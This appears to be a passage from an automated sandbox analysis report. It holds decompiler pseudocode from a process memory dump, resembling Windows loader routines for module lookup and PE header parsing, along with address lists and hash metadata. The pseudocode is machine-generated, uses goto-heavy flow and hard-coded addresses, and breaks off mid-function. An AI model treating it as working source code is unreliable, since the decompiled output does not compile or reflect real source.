                        				signed int _t239;
                        				signed int* _t247;
                        				signed int _t249;
                        				void* _t252;
                        				signed int _t256;
                        				signed int _t269;
                        				signed int _t271;
                        				signed int _t277;
                        				signed int _t279;
                        				intOrPtr _t283;
                        				signed int _t287;
                        				signed int _t288;
                        				void* _t289;
                        				signed char _t290;
                        				signed int _t292;
                        				signed int* _t293;
                        				unsigned int _t297;
                        				signed int _t306;
                        				signed int _t307;
                        				signed int _t308;
                        				signed int _t309;
                        				signed int _t310;
                        				intOrPtr _t311;
                        				intOrPtr _t312;
                        				signed int _t319;
                        				signed int _t320;
                        				signed int* _t324;
                        				signed int _t337;
                        				signed int _t338;
                        				signed int _t339;
                        				signed int* _t340;
                        				void* _t341;
                        				signed int _t344;
                        				signed int _t348;
                        				signed int _t349;
                        				signed int _t351;
                        				intOrPtr _t353;
                        				void* _t354;
                        				signed int _t356;
                        				signed int _t358;
                        				intOrPtr _t359;
                        				signed int _t361;
                        				signed int _t363;
                        				signed short* _t365;
                        				void* _t367;
                        				intOrPtr _t369;
                        				void* _t370;
                        				signed int _t371;
                        				signed int _t372;
                        				void* _t374;
                        				signed int _t376;
                        				void* _t384;
                        				signed int _t387;
                        
                        				_v8 =  *0x2c8d360 ^ _t376;
                        				_t2 =  &_a20;
                        				 *_t2 = _a20 & 0x00000001;
                        				_t287 = _a4;
                        				_v200 = _a12;
                        				_t365 = _a8;
                        				_v212 = _a16;
                        				_v180 = _a24;
                        				_v168 = 0;
                        				_v157 = 0;
                        				if( *_t2 != 0) {
                        					__eflags = E02BA6600(0x2c852d8);
                        					if(__eflags == 0) {
                        						goto L1;
                        					} else {
                        						_v188 = 6;
                        					}
                        				} else {
                        					L1:
                        					_v188 = 9;
                        				}
                        				if(_t365 == 0) {
                        					_v164 = 0;
                        					goto L5;
                        				} else {
                        					_t363 =  *_t365 & 0x0000ffff;
                        					_t341 = _t363 + 1;
                        					if((_t365[1] & 0x0000ffff) < _t341) {
                        						L109:
                        						__eflags = _t341 - 0x80;
                        						if(_t341 <= 0x80) {
                        							_t281 =  &_v140;
                        							_v164 =  &_v140;
                        							goto L114;
                        						} else {
                        							_t283 =  *0x2c87b9c; // 0x0
                        							_t281 = L02BB4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                        							_v164 = _t281;
                        							__eflags = _t281;
                        							if(_t281 != 0) {
                        								_v157 = 1;
                        								L114:
                        								E02BDF3E0(_t281, _t365[2], _t363);
                        								_t200 = _v164;
                        								 *((char*)(_v164 + _t363)) = 0;
                        								goto L5;
                        							} else {
                        								_t204 = 0xc000009a;
                        								goto L47;
                        							}
                        						}
                        					} else {
                        						_t200 = _t365[2];
                        						_v164 = _t200;
                        						if( *((char*)(_t200 + _t363)) != 0) {
                        							goto L109;
                        						} else {
                        							while(1) {
                        								L5:
                        								_t353 = 0;
                        								_t342 = 0x1000;
                        								_v176 = 0;
                        								if(_t287 == 0) {
                        									break;
                        								}
                        								_t384 = _t287 -  *0x2c87b90; // 0x779c0000
                        								if(_t384 == 0) {
                        									_t353 =  *0x2c87b8c; // 0x2732a08
                        									_v176 = _t353;
                        									_t320 = ( *(_t353 + 0x50))[8];
                        									_v184 = _t320;
                        								} else {
                        									E02BB2280(_t200, 0x2c884d8);
                        									_t277 =  *0x2c885f4; // 0x2732ef8
                        									_t351 =  *0x2c885f8 & 1;
                        									while(_t277 != 0) {
                        										_t337 =  *(_t277 - 0x50);
                        										if(_t337 > _t287) {
                        											_t338 = _t337 | 0xffffffff;
                        										} else {
                        											asm("sbb ecx, ecx");
                        											_t338 =  ~_t337;
                        										}
                        										_t387 = _t338;
                        										if(_t387 < 0) {
                        											_t339 =  *_t277;
                        											__eflags = _t351;
                        											if(_t351 != 0) {
                        												__eflags = _t339;
                        												if(_t339 == 0) {
                        													goto L16;
                        												} else {
                        													goto L118;
                        												}
                        												goto L151;
                        											} else {
                        												goto L16;
                        											}
                        											goto L17;
                        										} else {
                        											if(_t387 <= 0) {
                        												__eflags = _t277;
                        												if(_t277 != 0) {
                        													_t340 =  *(_t277 - 0x18);
                        													_t24 = _t277 - 0x68; // 0x2732e90
                        													_t353 = _t24;
                        													_v176 = _t353;
                        													__eflags = _t340[3] - 0xffffffff;
                        													if(_t340[3] != 0xffffffff) {
                        														_t279 =  *_t340;
                        														__eflags =  *(_t279 - 0x20) & 0x00000020;
                        														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                        															asm("lock inc dword [edi+0x9c]");
                        															_t340 =  *(_t353 + 0x50);
                        														}
                        													}
                        													_v184 = _t340[8];
                        												}
                        											} else {
                        												_t339 =  *(_t277 + 4);
                        												if(_t351 != 0) {
                        													__eflags = _t339;
                        													if(_t339 == 0) {
                        														goto L16;
                        													} else {
                        														L118:
                        														_t277 = _t277 ^ _t339;
                        														goto L17;
                        													}
                        													goto L151;
                        												} else {
                        													L16:
                        													_t277 = _t339;
                        												}
                        												goto L17;
                        											}
                        										}
                        										goto L25;
                        										L17:
                        									}
                        									L25:
                        									E02BAFFB0(_t287, _t353, 0x2c884d8);
                        									_t320 = _v184;
                        									_t342 = 0x1000;
                        								}
                        								if(_t353 == 0) {
                        									break;
                        								} else {
                        									_t366 = 0;
                        									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                        										_t288 = _v164;
                        										if(_t353 != 0) {
                        											_t342 = _t288;
                        											_t374 = E02BECC99(_t353, _t288, _v200, 1,  &_v168);
                        											if(_t374 >= 0) {
                        												if(_v184 == 7) {
                        													__eflags = _a20;
                        													if(__eflags == 0) {
                        														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                        														if(__eflags != 0) {
                        															_t271 = E02BA6600(0x2c852d8);
                        															__eflags = _t271;
                        															if(__eflags == 0) {
                        																_t342 = 0;
                        																_v169 = _t271;
                        																_t374 = E02BA7926( *(_t353 + 0x50), 0,  &_v169);
                        															}
                        														}
                        													}
                        												}
                        												if(_t374 < 0) {
                        													_v168 = 0;
                        												} else {
                        													if( *0x2c8b239 != 0) {
                        														_t342 =  *(_t353 + 0x18);
                        														E02C1E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                        													}
                        													if( *0x2c88472 != 0) {
                        														_v192 = 0;
                        														_t342 =  *0x7ffe0330;
                        														_t361 =  *0x2c8b218; // 0x0
                        														asm("ror edi, cl");
                        														 *0x2c8b1e0( &_v192, _t353, _v168, 0, _v180);
                        														 *(_t361 ^  *0x7ffe0330)();
                        														_t269 = _v192;
                        														_t353 = _v176;
                        														__eflags = _t269;
                        														if(__eflags != 0) {
                        															_v168 = _t269;
                        														}
                        													}
                        												}
                        											}
                        											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                        												_t366 = 0xc000007a;
                        											}
                        											_t247 =  *(_t353 + 0x50);
                        											if(_t247[3] == 0xffffffff) {
                        												L40:
                        												if(_t366 == 0xc000007a) {
                        													__eflags = _t288;
                        													if(_t288 == 0) {
                        														goto L136;
                        													} else {
                        														_t366 = 0xc0000139;
                        													}
                        													goto L54;
                        												}
                        											} else {
                        												_t249 =  *_t247;
                        												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                        													goto L40;
                        												} else {
                        													_t250 = _t249 | 0xffffffff;
                        													asm("lock xadd [edi+0x9c], eax");
                        													if((_t249 | 0xffffffff) == 0) {
                        														E02BB2280(_t250, 0x2c884d8);
                        														_t342 =  *(_t353 + 0x54);
                        														_t165 = _t353 + 0x54; // 0x54
                        														_t252 = _t165;
                        														__eflags =  *(_t342 + 4) - _t252;
                        														if( *(_t342 + 4) != _t252) {
                        															L135:
                        															asm("int 0x29");
                        															L136:
                        															_t288 = _v200;
                        															_t366 = 0xc0000138;
                        															L54:
                        															_t342 = _t288;
                        															L02BD3898(0, _t288, _t366);
                        														} else {
                        															_t324 =  *(_t252 + 4);
                        															__eflags =  *_t324 - _t252;
                        															if( *_t324 != _t252) {
                        																goto L135;
                        															} else {
                        																 *_t324 = _t342;
                        																 *(_t342 + 4) = _t324;
                        																_t293 =  *(_t353 + 0x50);
                        																_v180 =  *_t293;
                        																E02BAFFB0(_t293, _t353, 0x2c884d8);
                        																__eflags =  *((short*)(_t353 + 0x3a));
                        																if( *((short*)(_t353 + 0x3a)) != 0) {
                        																	_t342 = 0;
                        																	__eflags = 0;
                        																	E02BD37F5(_t353, 0);
                        																}
                        																E02BD0413(_t353);
                        																_t256 =  *(_t353 + 0x48);
                        																__eflags = _t256;
                        																if(_t256 != 0) {
                        																	__eflags = _t256 - 0xffffffff;
                        																	if(_t256 != 0xffffffff) {
                        																		E02BC9B10(_t256);
                        																	}
                        																}
                        																__eflags =  *(_t353 + 0x28);
                        																if( *(_t353 + 0x28) != 0) {
                        																	_t174 = _t353 + 0x24; // 0x24
                        																	E02BC02D6(_t174);
                        																}
                        																L02BB77F0( *0x2c87b98, 0, _t353);
                        																__eflags = _v180 - _t293;
                        																if(__eflags == 0) {
                        																	E02BCC277(_t293, _t366);
                        																}
                        																_t288 = _v164;
                        																goto L40;
                        															}
                        														}
                        													} else {
                        														goto L40;
                        													}
                        												}
                        											}
                        										}
                        									} else {
                        										L02BAEC7F(_t353);
                        										L02BC19B8(_t287, 0, _t353, 0);
                        										_t200 = E02B9F4E3(__eflags);
                        										continue;
                        									}
                        								}
                        								L41:
                        								if(_v157 != 0) {
                        									L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                        								}
                        								if(_t366 < 0) {
                        									L46:
                        									 *_v212 = _v168;
                        									_t204 = _t366;
                        									L47:
                        									_pop(_t354);
                        									_pop(_t367);
                        									_pop(_t289);
                        									return E02BDB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                        								} else {
                        									_t206 =  *0x2c8b2f8; // 0x210000
                        									if((_t206 |  *0x2c8b2fc) == 0 || ( *0x2c8b2e4 & 0x00000001) != 0) {
                        										goto L46;
                        									} else {
                        										_t297 =  *0x2c8b2ec; // 0x100
                        										_v200 = 0;
                        										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                        											_t355 = _v168;
                        											_t342 =  &_v208;
                        											_t208 = E02C46B68(_v168,  &_v208, _v168, __eflags);
                        											__eflags = _t208 - 1;
                        											if(_t208 == 1) {
                        												goto L46;
                        											} else {
                        												__eflags = _v208 & 0x00000010;
                        												if((_v208 & 0x00000010) == 0) {
                        													goto L46;
                        												} else {
                        													_t342 = 4;
                        													_t366 = E02C46AEB(_t355, 4,  &_v216);
                        													__eflags = _t366;
                        													if(_t366 >= 0) {
                        														goto L46;
                        													} else {
                        														asm("int 0x29");
                        														_t356 = 0;
                        														_v44 = 0;
                        														_t290 = _v52;
                        														__eflags = 0;
                        														if(0 == 0) {
                        															L108:
                        															_t356 = 0;
                        															_v44 = 0;
                        															goto L63;
                        														} else {
                        															__eflags = 0;
                        															if(0 < 0) {
                        																goto L108;
                        															}
                        															L63:
                        															_v112 = _t356;
                        															__eflags = _t356;
                        															if(_t356 == 0) {
                        																L143:
                        																_v8 = 0xfffffffe;
                        																_t211 = 0xc0000089;
                        															} else {
                        																_v36 = 0;
                        																_v60 = 0;
                        																_v48 = 0;
                        																_v68 = 0;
                        																_v44 = _t290 & 0xfffffffc;
                        																E02BAE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                        																_t306 = _v68;
                        																__eflags = _t306;
                        																if(_t306 == 0) {
                        																	_t216 = 0xc000007b;
                        																	_v36 = 0xc000007b;
                        																	_t307 = _v60;
                        																} else {
                        																	__eflags = _t290 & 0x00000001;
                        																	if(__eflags == 0) {
                        																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                        																		__eflags = _t349 - 0x10b;
                        																		if(_t349 != 0x10b) {
                        																			__eflags = _t349 - 0x20b;
                        																			if(_t349 == 0x20b) {
                        																				goto L102;
                        																			} else {
                        																				_t307 = 0;
                        																				_v48 = 0;
                        																				_t216 = 0xc000007b;
                        																				_v36 = 0xc000007b;
                        																				goto L71;
                        																			}
                        																		} else {
                        																			L102:
                        																			_t307 =  *(_t306 + 0x50);
                        																			goto L69;
                        																		}
                        																		goto L151;
                        																	} else {
                        																		_t239 = L02BAEAEA(_t290, _t290, _t356, _t366, __eflags);
                        																		_t307 = _t239;
                        																		_v60 = _t307;
                        																		_v48 = _t307;
                        																		__eflags = _t307;
                        																		if(_t307 != 0) {
                        																			L70:
                        																			_t216 = _v36;
                        																		} else {
                        																			_push(_t239);
                        																			_push(0x14);
                        																			_push( &_v144);
                        																			_push(3);
                        																			_push(_v44);
                        																			_push(0xffffffff);
                        																			_t319 = E02BD9730();
                        																			_v36 = _t319;
                        																			__eflags = _t319;
                        																			if(_t319 < 0) {
                        																				_t216 = 0xc000001f;
                        																				_v36 = 0xc000001f;
                        																				_t307 = _v60;
                        																			} else {
                        																				_t307 = _v132;
                        																				L69:
                        																				_v48 = _t307;
                        																				goto L70;
                        																			}
                        																		}
                        																	}
                        																}
                        																L71:
                        																_v72 = _t307;
                        																_v84 = _t216;
                        																__eflags = _t216 - 0xc000007b;
                        																if(_t216 == 0xc000007b) {
                        																	L150:
                        																	_v8 = 0xfffffffe;
                        																	_t211 = 0xc000007b;
                        																} else {
                        																	_t344 = _t290 & 0xfffffffc;
                        																	_v76 = _t344;
                        																	__eflags = _v40 - _t344;
                        																	if(_v40 <= _t344) {
                        																		goto L150;
                        																	} else {
                        																		__eflags = _t307;
                        																		if(_t307 == 0) {
                        																			L75:
                        																			_t217 = 0;
                        																			_v104 = 0;
                        																			__eflags = _t366;
                        																			if(_t366 != 0) {
                        																				__eflags = _t290 & 0x00000001;
                        																				if((_t290 & 0x00000001) != 0) {
                        																					_t217 = 1;
                        																					_v104 = 1;
                        																				}
                        																				_t290 = _v44;
                        																				_v52 = _t290;
                        																			}
                        																			__eflags = _t217 - 1;
                        																			if(_t217 != 1) {
                        																				_t369 = 0;
                        																				_t218 = _v40;
                        																				goto L91;
                        																			} else {
                        																				_v64 = 0;
                        																				E02BAE9C0(1, _t290, 0, 0,  &_v64);
                        																				_t309 = _v64;
                        																				_v108 = _t309;
                        																				__eflags = _t309;
                        																				if(_t309 == 0) {
                        																					goto L143;
                        																				} else {
                        																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                        																					__eflags = _t226 - 0x10b;
                        																					if(_t226 != 0x10b) {
                        																						__eflags = _t226 - 0x20b;
                        																						if(_t226 != 0x20b) {
                        																							goto L143;
                        																						} else {
                        																							_t371 =  *(_t309 + 0x98);
                        																							goto L83;
                        																						}
                        																					} else {
                        																						_t371 =  *(_t309 + 0x88);
                        																						L83:
                        																						__eflags = _t371;
                        																						if(_t371 != 0) {
                        																							_v80 = _t371 - _t356 + _t290;
                        																							_t310 = _v64;
                        																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                        																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                        																							_t311 = 0;
                        																							__eflags = 0;
                        																							while(1) {
                        																								_v120 = _t311;
                        																								_v116 = _t348;
                        																								__eflags = _t311 - _t292;
                        																								if(_t311 >= _t292) {
                        																									goto L143;
                        																								}
                        																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                        																								__eflags = _t371 - _t359;
                        																								if(_t371 < _t359) {
                        																									L98:
                        																									_t348 = _t348 + 0x28;
                        																									_t311 = _t311 + 1;
                        																									continue;
                        																								} else {
                        																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                        																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                        																										goto L98;
                        																									} else {
                        																										__eflags = _t348;
                        																										if(_t348 == 0) {
                        																											goto L143;
                        																										} else {
                        																											_t218 = _v40;
                        																											_t312 =  *_t218;
                        																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                        																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                        																												_v100 = _t359;
                        																												_t360 = _v108;
                        																												_t372 = L02BA8F44(_v108, _t312);
                        																												__eflags = _t372;
                        																												if(_t372 == 0) {
                        																													goto L143;
                        																												} else {
                        																													_t290 = _v52;
                        																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E02BD3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                        																													_t307 = _v72;
                        																													_t344 = _v76;
                        																													_t218 = _v40;
                        																													goto L91;
                        																												}
                        																											} else {
                        																												_t290 = _v52;
                        																												_t307 = _v72;
                        																												_t344 = _v76;
                        																												_t369 = _v80;
                        																												L91:
                        																												_t358 = _a4;
                        																												__eflags = _t358;
                        																												if(_t358 == 0) {
                        																													L95:
                        																													_t308 = _a8;
                        																													__eflags = _t308;
                        																													if(_t308 != 0) {
                        																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                        																													}
                        																													_v8 = 0xfffffffe;
                        																													_t211 = _v84;
                        																												} else {
                        																													_t370 =  *_t218 - _t369 + _t290;
                        																													 *_t358 = _t370;
                        																													__eflags = _t370 - _t344;
                        																													if(_t370 <= _t344) {
                        																														L149:
                        																														 *_t358 = 0;
                        																														goto L150;
                        																													} else {
                        																														__eflags = _t307;
                        																														if(_t307 == 0) {
                        																															goto L95;
                        																														} else {
                        																															__eflags = _t370 - _t344 + _t307;
                        																															if(_t370 >= _t344 + _t307) {
                        																																goto L149;
                        																															} else {
                        																																goto L95;
                        																															}
                        																														}
                        																													}
                        																												}
                        																											}
                        																										}
                        																									}
                        																								}
                        																								goto L97;
                        																							}
                        																						}
                        																						goto L143;
                        																					}
                        																				}
                        																			}
                        																		} else {
                        																			__eflags = _v40 - _t307 + _t344;
                        																			if(_v40 >= _t307 + _t344) {
                        																				goto L150;
                        																			} else {
                        																				goto L75;
                        																			}
                        																		}
                        																	}
                        																}
                        															}
                        															L97:
                        															 *[fs:0x0] = _v20;
                        															return _t211;
                        														}
                        													}
                        												}
                        											}
                        										} else {
                        											goto L46;
                        										}
                        									}
                        								}
                        								goto L151;
                        							}
                        							_t288 = _v164;
                        							_t366 = 0xc0000135;
                        							goto L41;
                        						}
                        					}
                        				}
                        				L151:
                        			}
                        0x02badc4d
                        0x02badc4d
                        0x02badc50
                        0x02badc52
                        0x02badc55
                        0x02badcfa
                        0x02badcfe
                        0x02badd08
                        0x02badd0a
                        0x02badd0c
                        0x00000000
                        0x02badd12
                        0x02badd15
                        0x02badd2d
                        0x02badd2f
                        0x02badd32
                        0x02badd35
                        0x00000000
                        0x02badd35
                        0x02badc5b
                        0x02badc5b
                        0x02badc5e
                        0x02badc61
                        0x02badc64
                        0x02badc67
                        0x02badc67
                        0x02badc6a
                        0x02badc6c
                        0x02badc8e
                        0x02badc8e
                        0x02badc91
                        0x02badc93
                        0x02badcce
                        0x02badcce
                        0x02badc95
                        0x02badc9c
                        0x02badc6e
                        0x02badc72
                        0x02badc75
                        0x02badc77
                        0x02badc79
                        0x02bfb551
                        0x02bfb551
                        0x00000000
                        0x02badc7f
                        0x02badc7f
                        0x02badc81
                        0x00000000
                        0x02badc83
                        0x02badc86
                        0x02badc88
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02badc88
                        0x02badc81
                        0x02badc79
                        0x02badc6c
                        0x02badc55
                        0x02badc47
                        0x02badc43
                        0x00000000
                        0x02badc36
                        0x02badc23
                        0x00000000
                        0x02badbff
                        0x02badbf1
                        0x02badbdf
                        0x02badb8f
                        0x02badb92
                        0x02badb95
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02badb95
                        0x02badb8d
                        0x02badb85
                        0x02badb74
                        0x02badc9f
                        0x02badca2
                        0x02badcb0
                        0x02badcb0
                        0x02badad1
                        0x02bfb4e5
                        0x02bfb4c8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bad831
                        0x02bad80d
                        0x00000000
                        0x02bad800
                        0x02bfb47f
                        0x02bfb485
                        0x00000000
                        0x02bfb485
                        0x02bad665
                        0x02bad652
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 53c81e32e73af770164dacf9f48198a9b0f1e4f971d22b4dd0ec7c9cc492d425
                        • Instruction ID: f8860df152df93f90debe585d965cb568a96fee4f5ff8a2e6e97f24be57edcb9
                        • Opcode Fuzzy Hash: 53c81e32e73af770164dacf9f48198a9b0f1e4f971d22b4dd0ec7c9cc492d425
                        • Instruction Fuzzy Hash: 2CE1D330A0835ACFDB24DF18C964BA9B7B6FF45308F1442E9D90997690DB70AD85CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E02BA849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                        				void* _t136;
                        				signed int _t139;
                        				signed int _t141;
                        				signed int _t145;
                        				intOrPtr _t146;
                        				signed int _t149;
                        				signed int _t150;
                        				signed int _t161;
                        				signed int _t163;
                        				signed int _t165;
                        				signed int _t169;
                        				signed int _t171;
                        				signed int _t194;
                        				signed int _t200;
                        				void* _t201;
                        				signed int _t204;
                        				signed int _t206;
                        				signed int _t210;
                        				signed int _t214;
                        				signed int _t215;
                        				signed int _t218;
                        				void* _t221;
                        				signed int _t224;
                        				signed int _t226;
                        				intOrPtr _t228;
                        				signed int _t232;
                        				signed int _t233;
                        				signed int _t234;
                        				void* _t237;
                        				void* _t238;
                        
                        				_t236 = __esi;
                        				_t235 = __edi;
                        				_t193 = __ebx;
                        				_push(0x70);
                        				_push(0x2c6f9c0);
                        				E02BED0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                        				if( *0x2c87b04 == 0) {
                        					L4:
                        					goto L5;
                        				} else {
                        					_t136 = E02BACEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                        					_t236 = 0;
                        					if(_t136 < 0) {
                        						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                        					}
                        					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                        						_t193 =  *( *[fs:0x30] + 0x18);
                        						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                        						 *(_t237 - 0x68) = _t236;
                        						 *(_t237 - 0x6c) = _t236;
                        						_t235 = _t236;
                        						 *(_t237 - 0x60) = _t236;
                        						E02BB2280( *[fs:0x30], 0x2c88550);
                        						_t139 =  *0x2c87b04; // 0x1
                        						__eflags = _t139 - 1;
                        						if(__eflags != 0) {
                        							_t200 = 0xc;
                        							_t201 = _t237 - 0x40;
                        							_t141 = E02BCF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                        							 *(_t237 - 0x44) = _t141;
                        							__eflags = _t141;
                        							if(_t141 < 0) {
                        								L50:
                        								E02BAFFB0(_t193, _t235, 0x2c88550);
                        								L5:
                        								return E02BED130(_t193, _t235, _t236);
                        							}
                        							_push(_t201);
                        							_t221 = 0x10;
                        							_t202 =  *(_t237 - 0x40);
                        							_t145 = E02B91C45( *(_t237 - 0x40), _t221);
                        							 *(_t237 - 0x44) = _t145;
                        							__eflags = _t145;
                        							if(_t145 < 0) {
                        								goto L50;
                        							}
                        							_t146 =  *0x2c87b9c; // 0x0
                        							_t235 = L02BB4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                        							 *(_t237 - 0x60) = _t235;
                        							__eflags = _t235;
                        							if(_t235 == 0) {
                        								_t149 = 0xc0000017;
                        								 *(_t237 - 0x44) = 0xc0000017;
                        							} else {
                        								_t149 =  *(_t237 - 0x44);
                        							}
                        							__eflags = _t149;
                        							if(__eflags >= 0) {
                        								L8:
                        								 *(_t237 - 0x64) = _t235;
                        								_t150 =  *0x2c87b10; // 0x8
                        								 *(_t237 - 0x4c) = _t150;
                        								_push(_t237 - 0x74);
                        								_push(_t237 - 0x39);
                        								_push(_t237 - 0x58);
                        								_t193 = E02BCA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                        								 *(_t237 - 0x44) = _t193;
                        								__eflags = _t193;
                        								if(_t193 < 0) {
                        									L30:
                        									E02BAFFB0(_t193, _t235, 0x2c88550);
                        									__eflags = _t235 - _t237 - 0x38;
                        									if(_t235 != _t237 - 0x38) {
                        										_t235 =  *(_t237 - 0x48);
                        										L02BB77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                        									} else {
                        										_t235 =  *(_t237 - 0x48);
                        									}
                        									__eflags =  *(_t237 - 0x6c);
                        									if( *(_t237 - 0x6c) != 0) {
                        										L02BB77F0(_t235, _t236,  *(_t237 - 0x6c));
                        									}
                        									__eflags = _t193;
                        									if(_t193 >= 0) {
                        										goto L4;
                        									} else {
                        										goto L5;
                        									}
                        								}
                        								_t204 =  *0x2c87b04; // 0x1
                        								 *(_t235 + 8) = _t204;
                        								__eflags =  *((char*)(_t237 - 0x39));
                        								if( *((char*)(_t237 - 0x39)) != 0) {
                        									 *(_t235 + 4) = 1;
                        									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                        									_t161 =  *0x2c87b10; // 0x8
                        									 *(_t237 - 0x4c) = _t161;
                        								} else {
                        									 *(_t235 + 4) = _t236;
                        									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                        								}
                        								 *((intOrPtr*)(_t237 - 0x54)) = E02BD37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                        								_t224 = _t236;
                        								 *(_t237 - 0x40) = _t236;
                        								 *(_t237 - 0x50) = _t236;
                        								while(1) {
                        									_t163 =  *(_t235 + 8);
                        									__eflags = _t224 - _t163;
                        									if(_t224 >= _t163) {
                        										break;
                        									}
                        									_t228 =  *0x2c87b9c; // 0x0
                        									_t214 = L02BB4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                        									 *(_t237 - 0x78) = _t214;
                        									__eflags = _t214;
                        									if(_t214 == 0) {
                        										L52:
                        										_t193 = 0xc0000017;
                        										L19:
                        										 *(_t237 - 0x44) = _t193;
                        										L20:
                        										_t206 =  *(_t237 - 0x40);
                        										__eflags = _t206;
                        										if(_t206 == 0) {
                        											L26:
                        											__eflags = _t193;
                        											if(_t193 < 0) {
                        												E02BD37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                        												__eflags =  *((char*)(_t237 - 0x39));
                        												if( *((char*)(_t237 - 0x39)) != 0) {
                        													 *0x2c87b10 =  *0x2c87b10 - 8;
                        												}
                        											} else {
                        												_t169 =  *(_t237 - 0x68);
                        												__eflags = _t169;
                        												if(_t169 != 0) {
                        													 *0x2c87b04 =  *0x2c87b04 - _t169;
                        												}
                        											}
                        											__eflags = _t193;
                        											if(_t193 >= 0) {
                        												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                        											}
                        											goto L30;
                        										}
                        										_t226 = _t206 * 0xc;
                        										__eflags = _t226;
                        										_t194 =  *(_t237 - 0x48);
                        										do {
                        											 *(_t237 - 0x40) = _t206 - 1;
                        											_t226 = _t226 - 0xc;
                        											 *(_t237 - 0x4c) = _t226;
                        											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                        											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                        												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                        												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                        													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                        													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                        													__eflags =  *((char*)(_t237 - 0x39));
                        													if( *((char*)(_t237 - 0x39)) == 0) {
                        														_t171 = _t210;
                        													} else {
                        														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                        														L02BB77F0(_t194, _t236, _t210 - 8);
                        														_t171 =  *(_t237 - 0x50);
                        													}
                        													L48:
                        													L02BB77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                        													L46:
                        													_t206 =  *(_t237 - 0x40);
                        													_t226 =  *(_t237 - 0x4c);
                        													goto L24;
                        												}
                        												 *0x2c87b08 =  *0x2c87b08 + 1;
                        												goto L24;
                        											}
                        											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                        											__eflags = _t171;
                        											if(_t171 != 0) {
                        												__eflags =  *((char*)(_t237 - 0x39));
                        												if( *((char*)(_t237 - 0x39)) == 0) {
                        													goto L48;
                        												}
                        												E02BD57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                        												goto L46;
                        											}
                        											L24:
                        											__eflags = _t206;
                        										} while (_t206 != 0);
                        										_t193 =  *(_t237 - 0x44);
                        										goto L26;
                        									}
                        									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                        									 *(_t237 - 0x7c) = _t232;
                        									 *(_t232 - 4) = _t214;
                        									 *(_t237 - 4) = _t236;
                        									E02BDF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                        									_t238 = _t238 + 0xc;
                        									 *(_t237 - 4) = 0xfffffffe;
                        									_t215 =  *(_t237 - 0x48);
                        									__eflags = _t193;
                        									if(_t193 < 0) {
